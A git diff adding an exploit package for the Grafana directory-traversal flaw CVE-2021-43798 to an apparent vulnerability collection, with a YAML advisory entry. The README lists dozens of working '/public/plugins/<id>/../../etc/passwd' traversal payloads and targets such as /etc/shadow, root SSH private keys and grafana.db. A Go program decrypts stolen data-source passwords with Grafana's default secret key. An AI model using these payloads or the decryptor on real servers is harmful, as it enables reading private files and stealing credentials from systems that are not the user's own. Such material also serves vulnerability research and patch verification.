diff --git a/cve/Grafana/2021/CVE-2021-43798/AESDecrypt.go b/cve/Grafana/2021/CVE-2021-43798/AESDecrypt.go
new file mode 100644
index 0000000000000000000000000000000000000000..60f6f67c5d45110683f4ce6cfee67ca0f71a443f
--- /dev/null
+++ b/cve/Grafana/2021/CVE-2021-43798/AESDecrypt.go
@@ -0,0 +1,183 @@
+package main
+
+import (
+ "bytes"
+ "crypto/aes"
+ "crypto/cipher"
+ "crypto/rand"
+ "crypto/sha256"
+ "encoding/base64"
+ "errors"
+ "fmt"
+ "golang.org/x/crypto/pbkdf2"
+ "io"
+)
+
+const (
+ saltLength = 8
+ aesCfb = "aes-cfb"
+ aesGcm = "aes-gcm"
+ encryptionAlgorithmDelimiter = '*'
+)
+
+func deriveEncryptionAlgorithm(payload []byte) (string, []byte, error) {
+ if len(payload) == 0 {
+ return "", nil, fmt.Errorf("unable to derive encryption algorithm")
+ }
+
+ if payload[0] != encryptionAlgorithmDelimiter {
+ return aesCfb, payload, nil // backwards compatibility
+ }
+
+ payload = payload[1:]
+ algDelim := bytes.Index(payload, []byte{encryptionAlgorithmDelimiter})
+ if algDelim == -1 {
+ return aesCfb, payload, nil // backwards compatibility
+ }
+
+ algB64 := payload[:algDelim]
+ payload = payload[algDelim+1:]
+
+ alg := make([]byte, base64.RawStdEncoding.DecodedLen(len(algB64)))
+
+ _, err := base64.RawStdEncoding.Decode(alg, algB64)
+ if err != nil {
+ return "", nil, err
+ }
+
+ return string(alg), payload, nil
+}
+
+func decryptGCM(block cipher.Block, payload []byte) ([]byte, error) {
+ gcm, err := cipher.NewGCM(block)
+ if err != nil {
+ return nil, err
+ }
+
+ nonce := payload[saltLength : saltLength+gcm.NonceSize()]
+ ciphertext := payload[saltLength+gcm.NonceSize():]
+ return gcm.Open(nil, nonce, ciphertext, nil)
+}
+
+// Key needs to be 32bytes
+func encryptionKeyToBytes(secret, salt string) ([]byte, error) {
+ return pbkdf2.Key([]byte(secret), []byte(salt), 10000, 32, sha256.New), nil
+}
+
+func decryptCFB(block cipher.Block, payload []byte) ([]byte, error) {
+ // The IV needs to be unique, but not secure. Therefore it's common to
+ // include it at the beginning of the ciphertext.
+ if len(payload) < aes.BlockSize {
+ return nil, errors.New("payload too short")
+ }
+
+ iv := payload[saltLength : saltLength+aes.BlockSize]
+ payload = payload[saltLength+aes.BlockSize:]
+ payloadDst := make([]byte, len(payload))
+
+ stream := cipher.NewCFBDecrypter(block, iv)
+
+ // XORKeyStream can work in-place if the two arguments are the same.
+ stream.XORKeyStream(payloadDst, payload)
+ return payloadDst, nil
+}
+
+func Decrypt(payload []byte, secret string) ([]byte, error) {
+ alg, payload, err := deriveEncryptionAlgorithm(payload)
+ if err != nil {
+ return nil, err
+ }
+
+ if len(payload) < saltLength {
+ return nil, fmt.Errorf("unable to compute salt")
+ }
+ salt := payload[:saltLength]
+ key, err := encryptionKeyToBytes(secret, string(salt))
+ if err != nil {
+ return nil, err
+ }
+
+ block, err := aes.NewCipher(key)
+ if err != nil {
+ return nil, err
+ }
+
+ switch alg {
+ case aesGcm:
+ return decryptGCM(block, payload)
+ default:
+ return decryptCFB(block, payload)
+ }
+}
+
+// Encrypt encrypts a payload with a given secret.
+// DEPRECATED. Do not use it.
+// Use secrets.Service instead.
+func Encrypt(payload []byte, secret string) ([]byte, error) {
+ salt, err := GetRandomString(saltLength)
+ if err != nil {
+ return nil, err
+ }
+
+ key, err := encryptionKeyToBytes(secret, salt)
+ if err != nil {
+ return nil, err
+ }
+ block, err := aes.NewCipher(key)
+ if err != nil {
+ return nil, err
+ }
+
+ // The IV needs to be unique, but not secure. Therefore it's common to
+ // include it at the beginning of the ciphertext.
+ ciphertext := make([]byte, saltLength+aes.BlockSize+len(payload))
+ copy(ciphertext[:saltLength], salt)
+ iv := ciphertext[saltLength : saltLength+aes.BlockSize]
+ if _, err := io.ReadFull(rand.Reader, iv); err != nil {
+ return nil, err
+ }
+
+ stream := cipher.NewCFBEncrypter(block, iv)
+ stream.XORKeyStream(ciphertext[saltLength+aes.BlockSize:], payload)
+
+ return ciphertext, nil
+}
+
+// GetRandomString generate random string by specify chars.
+// source: https://github.com/gogits/gogs/blob/9ee80e3e5426821f03a4e99fad34418f5c736413/modules/base/tool.go#L58
+func GetRandomString(n int, alphabets ...byte) (string, error) {
+ const alphanum = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
+ var bytes = make([]byte, n)
+ if _, err := rand.Read(bytes); err != nil {
+ return "", err
+ }
+
+ for i, b := range bytes {
+ if len(alphabets) == 0 {
+ bytes[i] = alphanum[b%byte(len(alphanum))]
+ } else {
+ bytes[i] = alphabets[b%byte(len(alphabets))]
+ }
+ }
+ return string(bytes), nil
+}
+
+func main() {
+ // decode base64str
+ var grafanaIni_secretKey = "SW2YcwTIb9zpOOhoPsMm"
+ var dataSourcePassword = "R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q=="
+ encrypted, _ := base64.StdEncoding.DecodeString(dataSourcePassword)
+ PwdBytes, _ := Decrypt(encrypted, grafanaIni_secretKey)
+ fmt.Println("[*] grafanaIni_secretKey= " + grafanaIni_secretKey)
+ fmt.Println("[*] DataSourcePassword= " + dataSourcePassword)
+ fmt.Println("[*] plainText= " + string(PwdBytes))
+
+ fmt.Println("\n")
+ // encode str (dataSourcePassword)
+ var PlainText = "jas502n"
+ encryptedByte, _ := Encrypt([]byte(PlainText), grafanaIni_secretKey)
+ var encryptedStr = base64.StdEncoding.EncodeToString(encryptedByte)
+ fmt.Println("[*] grafanaIni_secretKey= " + grafanaIni_secretKey)
+ fmt.Println("[*] PlainText= " + PlainText)
+ fmt.Println("[*] EncodePassword= " + encryptedStr)
+}
diff --git a/cve/Grafana/2021/CVE-2021-43798/README.md b/cve/Grafana/2021/CVE-2021-43798/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..9deca6f25d7d4d1eaacbd5914abb52b3071209f7
--- /dev/null
+++ b/cve/Grafana/2021/CVE-2021-43798/README.md
@@ -0,0 +1,336 @@
+# CVE-2021-43798 Grafana Unauthorized arbitrary file reading vulnerability
+
+8.3.1 (2021-12-07) Security: Fixes **CVE-2021-43798** . For more information, see our blog
+
+https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
+
+
+
+
+
+
+### Example: get db password
+
+`/var/lib/grafana/grafana.db`
+
+
+
+加盐密码明文验证
+https://github.com/grafana/grafana/blob/985c61d7008211e0fbee7d095bf3424adf71b4ac/pkg/util/encoding.go
+
+
+
+```golang
+package main
+
+import (
+ "crypto/sha256"
+ "encoding/hex"
+ "fmt"
+ "golang.org/x/crypto/pbkdf2"
+)
+
+// EncodePassword encodes a password using PBKDF2.
+func EncodePassword(password string, salt string) string {
+ newPasswd := pbkdf2.Key([]byte(password), []byte(salt), 10000, 50, sha256.New)
+ return hex.EncodeToString(newPasswd)
+}
+
+func main() {
+ fmt.Println(EncodePassword("admin", "F3FAxVm33R"))
+}
+
+
+```
+
+
+
+Config `/etc/grafana/grafana.ini`
+
+```
+bash-5.1$ ps -ef |grep grafana
+ 1 grafana 0:35 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cfg:default.log.mode=console cfg:default.paths.data=/var/lib/grafana cfg:default.paths.logs=/var/log/grafana cfg:default.paths.plugins=/var/lib/grafana/plugins cfg:default.paths.provisioning=/etc/grafana/provisioning
+```
+
+
+### Ensure encryption of data source secrets
+
+Data sources store passwords and basic auth passwords in secureJsonData encrypted (AES-256 in CFB mode) by default. Existing data source will keep working with unencrypted passwords. If you want to migrate to encrypted storage for your existing data sources you can do that by:
+
+- For data sources created through UI, you need to go to data source config, re-enter the password or basic auth password and save the data source.
+- For data sources created by provisioning, you need to update your config file and use secureJsonData.password or secureJsonData.basicAuthPassword field. See [provisioning docs]({{< relref "../administration/provisioning" >}}) for example of current configuration.
+
+https://github.com/grafana/grafana/blob/main/pkg/util/encryption.go
+
+
+
+#### decode password
+
+例如: 从数据库`/var/lib/grafana/grafana.db`获得数据源密文 `R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==` ,通过读取 `/etc/grafana/grafana.ini` 中的 `secret_key` (default: SW2YcwTIb9zpOOhoPsMm),进行解密
+
+```
+$ go run AESDecrypt.go
+[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
+[*] DataSourcePassword= R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
+[*] plainText= jas502n
+
+```
+
+#### encode password
+例如: 将明文密码`jas502n`通过key,加密成密文
+
+```
+[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
+[*] PlainText= jas502n
+[*] EncodePassword= QWhMOFdNZkqW6bx9YM0dPHMjzInsvycQXgMmMfFqpA==
+```
+
+### other attack
+
+```
+/conf/defaults.ini
+/etc/grafana/grafana.ini
+/etc/passwd
+/etc/shadow
+/home/grafana/.bash_history
+/home/grafana/.ssh/id_rsa
+/root/.bash_history
+/root/.ssh/id_rsa
+/usr/local/etc/grafana/grafana.ini
+/var/lib/grafana/grafana.db
+/proc/net/fib_trie
+/proc/net/tcp
+/proc/self/cmdline
+```
+
+```
+Default plugins count: 40
+Successful count: 48
+```
+[Bypass grafana nginx Proxy error 400 ](https://articles.zsxq.com/id_baeb9hmiroq5.html)
+
+https://twitter.com/chybeta/status/1468410745264041992
+
+
+```
+/public/plugins/alertGroups/../../../../../../../../etc/passwd
+/public/plugins/alertlist/../../../../../../../../etc/passwd
+/public/plugins/alertmanager/../../../../../../../../etc/passwd
+/public/plugins/annolist/../../../../../../../../etc/passwd
+/public/plugins/barchart/../../../../../../../../etc/passwd
+/public/plugins/bargauge/../../../../../../../../etc/passwd
+/public/plugins/canvas/../../../../../../../../etc/passwd
+/public/plugins/cloudwatch/../../../../../../../../etc/passwd
+/public/plugins/dashboard/../../../../../../../../etc/passwd
+/public/plugins/dashlist/../../../../../../../../etc/passwd
+/public/plugins/debug/../../../../../../../../etc/passwd
+/public/plugins/elasticsearch/../../../../../../../../etc/passwd
+/public/plugins/gauge/../../../../../../../../etc/passwd
+/public/plugins/geomap/../../../../../../../../etc/passwd
+/public/plugins/gettingstarted/../../../../../../../../etc/passwd
+/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
+/public/plugins/grafana/../../../../../../../../etc/passwd
+/public/plugins/graph/../../../../../../../../etc/passwd
+/public/plugins/graphite/../../../../../../../../etc/passwd
+/public/plugins/heatmap/../../../../../../../../etc/passwd
+/public/plugins/histogram/../../../../../../../../etc/passwd
+/public/plugins/influxdb/../../../../../../../../etc/passwd
+/public/plugins/jaeger/../../../../../../../../etc/passwd
+/public/plugins/live/../../../../../../../../etc/passwd
+/public/plugins/logs/../../../../../../../../etc/passwd
+/public/plugins/loki/../../../../../../../../etc/passwd
+/public/plugins/mixed/../../../../../../../../etc/passwd
+/public/plugins/mssql/../../../../../../../../etc/passwd
+/public/plugins/mysql/../../../../../../../../etc/passwd
+/public/plugins/news/../../../../../../../../etc/passwd
+/public/plugins/nodeGraph/../../../../../../../../etc/passwd
+/public/plugins/opentsdb/../../../../../../../../etc/passwd
+/public/plugins/piechart/../../../../../../../../etc/passwd
+/public/plugins/pluginlist/../../../../../../../../etc/passwd
+/public/plugins/postgres/../../../../../../../../etc/passwd
+/public/plugins/prometheus/../../../../../../../../etc/passwd
+/public/plugins/stat/../../../../../../../../etc/passwd
+/public/plugins/state-timeline/../../../../../../../../etc/passwd
+/public/plugins/status-history/../../../../../../../../etc/passwd
+/public/plugins/table-old/../../../../../../../../etc/passwd
+/public/plugins/table/../../../../../../../../etc/passwd
+/public/plugins/tempo/../../../../../../../../etc/passwd
+/public/plugins/testdata/../../../../../../../../etc/passwd
+/public/plugins/text/../../../../../../../../etc/passwd
+/public/plugins/timeseries/../../../../../../../../etc/passwd
+/public/plugins/welcome/../../../../../../../../etc/passwd
+/public/plugins/xychart/../../../../../../../../etc/passwd
+/public/plugins/zipkin/../../../../../../../../etc/passwd
+```
+
+# 0x0 Default plugins installed (40) list:
+
+http://x.x.x.x:3000/api/plugins?embedded=0
+
+```
+alertlist
+annolist
+grafana-azure-monitor-datasource
+barchart
+bargauge
+cloudwatch
+dashlist
+elasticsearch
+gauge
+geomap
+gettingstarted
+stackdriver
+graph
+graphite
+heatmap
+histogram
+influxdb
+jaeger
+logs
+loki
+mssql
+mysql
+news
+nodeGraph
+opentsdb
+piechart
+pluginlist
+postgres
+prometheus
+stat
+state-timeline
+status-history
+table
+table-old
+tempo
+testdata
+text
+timeseries
+welcome
+zipkin
+```
+
+
+# 0x01 /usr/share/grafana/public/app/plugins/datasource ( 21)
+
+```
+/usr/share/grafana/public/app/plugins/datasource
+
+bash-5.1$ ls -l
+drwxr-xr-x 3 root root 4096 Oct 7 10:55 alertmanager
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 cloud-monitoring
+drwxr-xr-x 8 root root 4096 Oct 7 10:55 cloudwatch
+drwxr-xr-x 2 root root 4096 Oct 7 10:55 dashboard
+drwxr-xr-x 9 root root 4096 Oct 7 10:55 elasticsearch
+drwxr-xr-x 3 root root 4096 Oct 7 10:55 grafana
+drwxr-xr-x 19 root root 4096 Oct 7 10:55 grafana-azure-monitor-datasource
+drwxr-xr-x 9 root root 4096 Oct 7 10:55 graphite
+drwxr-xr-x 6 root root 4096 Oct 7 10:55 influxdb
+drwxr-xr-x 4 root root 4096 Oct 7 10:55 jaeger
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 loki
+drwxr-xr-x 2 root root 4096 Oct 7 10:55 mixed
+drwxr-xr-x 5 root root 4096 Oct 7 10:55 mssql
+drwxr-xr-x 5 root root 4096 Oct 7 10:55 mysql
+drwxr-xr-x 6 root root 4096 Oct 7 10:55 opentsdb
+drwxr-xr-x 5 root root 4096 Oct 7 10:55 postgres
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 prometheus
+drwxr-xr-x 4 root root 4096 Oct 7 10:55 tempo
+drwxr-xr-x 7 root root 4096 Oct 7 10:55 testdata
+drwxr-xr-x 4 root root 4096 Oct 7 10:55 zipkin
+```
+Fuzz Successful!
+
+
+```
+/public/plugins/alertmanager/../../../../../../../../etc/passwd
+/public/plugins/cloudwatch/../../../../../../../../etc/passwd
+/public/plugins/dashboard/../../../../../../../../etc/passwd
+/public/plugins/elasticsearch/../../../../../../../../etc/passwd
+/public/plugins/grafana/../../../../../../../../etc/passwd
+/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
+/public/plugins/graphite/../../../../../../../../etc/passwd
+/public/plugins/influxdb/../../../../../../../../etc/passwd
+/public/plugins/jaeger/../../../../../../../../etc/passwd
+/public/plugins/loki/../../../../../../../../etc/passwd
+/public/plugins/mixed/../../../../../../../../etc/passwd
+/public/plugins/mssql/../../../../../../../../etc/passwd
+/public/plugins/mysql/../../../../../../../../etc/passwd
+/public/plugins/opentsdb/../../../../../../../../etc/passwd
+/public/plugins/postgres/../../../../../../../../etc/passwd
+/public/plugins/prometheus/../../../../../../../../etc/passwd
+/public/plugins/tempo/../../../../../../../../etc/passwd
+/public/plugins/testdata/../../../../../../../../etc/passwd
+/public/plugins/zipkin/../../../../../../../../etc/passwd
+```
+
+# 0x02 /usr/share/grafana/public/app/plugins/ (29)
+
+```
+/usr/share/grafana/public/app/plugins/panel/
+
+drwxr-xr-x 2 root root 4.0K Oct 7 10:55 alertGroups
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 alertlist
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 annolist
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 barchart
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 bargauge
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 canvas
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 dashlist
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 debug
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 gauge
+drwxr-xr-x 8 root root 4.0K Oct 7 10:55 geomap
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 gettingstarted
+drwxr-xr-x 5 root root 4.0K Oct 7 10:55 graph
+drwxr-xr-x 5 root root 4.0K Oct 7 10:55 heatmap
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 histogram
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 live
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 logs
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 news
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 nodeGraph
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 piechart
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 pluginlist
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 stat
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 state-timeline
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 status-history
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 table
+drwxr-xr-x 4 root root 4.0K Oct 7 10:55 table-old
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 text
+drwxr-xr-x 6 root root 4.0K Oct 7 10:55 timeseries
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 welcome
+drwxr-xr-x 3 root root 4.0K Oct 7 10:55 xychart
+```
+
+
+Fuzz Success
+
+```
+/public/plugins/alertGroups/../../../../../../../../etc/passwd
+/public/plugins/alertlist/../../../../../../../../etc/passwd
+/public/plugins/annolist/../../../../../../../../etc/passwd
+/public/plugins/barchart/../../../../../../../../etc/passwd
+/public/plugins/bargauge/../../../../../../../../etc/passwd
+/public/plugins/canvas/../../../../../../../../etc/passwd
+/public/plugins/dashlist/../../../../../../../../etc/passwd
+/public/plugins/debug/../../../../../../../../etc/passwd
+/public/plugins/gauge/../../../../../../../../etc/passwd
+/public/plugins/geomap/../../../../../../../../etc/passwd
+/public/plugins/gettingstarted/../../../../../../../../etc/passwd
+/public/plugins/graph/../../../../../../../../etc/passwd
+/public/plugins/heatmap/../../../../../../../../etc/passwd
+/public/plugins/histogram/../../../../../../../../etc/passwd
+/public/plugins/live/../../../../../../../../etc/passwd
+/public/plugins/logs/../../../../../../../../etc/passwd
+/public/plugins/news/../../../../../../../../etc/passwd
+/public/plugins/nodeGraph/../../../../../../../../etc/passwd
+/public/plugins/piechart/../../../../../../../../etc/passwd
+/public/plugins/pluginlist/../../../../../../../../etc/passwd
+/public/plugins/stat/../../../../../../../../etc/passwd
+/public/plugins/state-timeline/../../../../../../../../etc/passwd
+/public/plugins/status-history/../../../../../../../../etc/passwd
+/public/plugins/table/../../../../../../../../etc/passwd
+/public/plugins/table-old/../../../../../../../../etc/passwd
+/public/plugins/text/../../../../../../../../etc/passwd
+/public/plugins/timeseries/../../../../../../../../etc/passwd
+/public/plugins/welcome/../../../../../../../../etc/passwd
+/public/plugins/xychart/../../../../../../../../etc/passwd
+```
+
diff --git a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..6580d144188b424c6454b72efa75c6b32853e90a
--- /dev/null
+++ b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml
@@ -0,0 +1,19 @@
+id: CVE-2021-43798
+source: https://github.com/jas502n/Grafana-CVE-2021-43798
+info:
+ name: Grafana 是一个用于监控和可观测性的开源平台。
+ severity: high
+ description: |
+ Grafana 是一个用于监测和可观测性的开源平台。Grafana 版本8.0.0-beta1到8.3.0(打了补丁的版本除外)容易受到目录遍历的影响,允许访问本地文件。易受攻击的 URL 路径是:`/public/plugins//`,这里是所有已安装插件的插件 ID。建议用户升级到打了补丁的版本8.0.7、8.1.8、8.2.7或8.3.1。GitHub 安全咨询包含有关易受攻击的URL路径、缓解和公开时间表的更多信息。
+ scope-of-influence:
+ grafana:8.0.0-8.3.0
+ reference:
+ - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-43798
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags: CVE2021, grafana
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 34ec4afd0b0d7c012e35fcdb4915f75d7844514e..8d72f1e8e4d4c1ac10e6cd3bcb302c53e377ecae 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -144,6 +144,8 @@ cve:
- CVE-2022-0824
Zimbra:
- CVE-2022-27925
+ Grafana:
+ - CVE-2021-43798
cnvd:
apache-tomcat:
- CNVD-2020-10487